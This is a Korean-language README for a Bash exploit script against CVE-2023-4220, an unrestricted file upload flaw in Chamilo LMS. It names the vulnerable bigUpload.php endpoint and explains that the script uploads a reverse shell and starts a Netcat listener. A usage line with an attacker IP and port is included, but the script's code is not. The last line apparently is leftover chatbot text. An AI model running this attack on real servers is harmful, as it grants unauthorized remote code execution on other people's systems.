
Refurbish Chamilo LMS CVE-2023-4220 Bash로 작성된 익스플로잇
이 스크립트는 Chamilo LMS 버전 ≤ v1.11.24에서 원격 코드 실행(RCE) 취약점을 악용합니다. CVE-2023-4220으로 알려진 이 취약점은 Chamilo LMS의 bigUpload.php 기능에서 파일 업로드 제한이 없기 때문에 발생하며, 공격자가 임의의 파일(예: 웹 셸)을 업로드하고 실행하여 서버에서 완전한 원격 코드 실행을 유발할 수 있습니다.
이 스크립트는 Divine Clown에 의해 개선되어 공격 과정을 단순화하고, 자동으로 리버스 셸 파일을 생성하여 대상에 업로드한 후 리스너를 실행하여 공격자가 셸에 직접 접근할 수 있도록 합니다.
/main/inc/lib/javascript/bigupload/inc/bigUpload.php에서의 제한 없는 파일 업로드bigUpload.php 엔드포인트를 사용하여 리버스 셸을 업로드합니다../CVE-2023-4220.sh -i <공격자_IP> -p <포트> -h <호스트_링크>
-i <공격자_IP>: 리버스 셸을 위한 공격자의 IP 주소-p <포트>: Netcat 리스너를 시작할 포트-h <호스트_링크>: 취약한 Chamilo LMS 인스턴스의 전체 URL./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com
이 도구는 오직 교육 목적과 취약점을 악용할 명시적 허가를 받은 테스트 환경에서만 사용하기 위한 것입니다. 시스템에 대한 무단 접근은 불법이며 형사 처벌을 받을 수 있습니다. 저자는 이 스크립트의 오용 또는 이로 인한 손해에 대해 책임을 지지 않습니다.
추가 정보나 서식을 포함하려면 README를 자유롭게 수정하세요! 다른 것이 필요하면 알려주세요.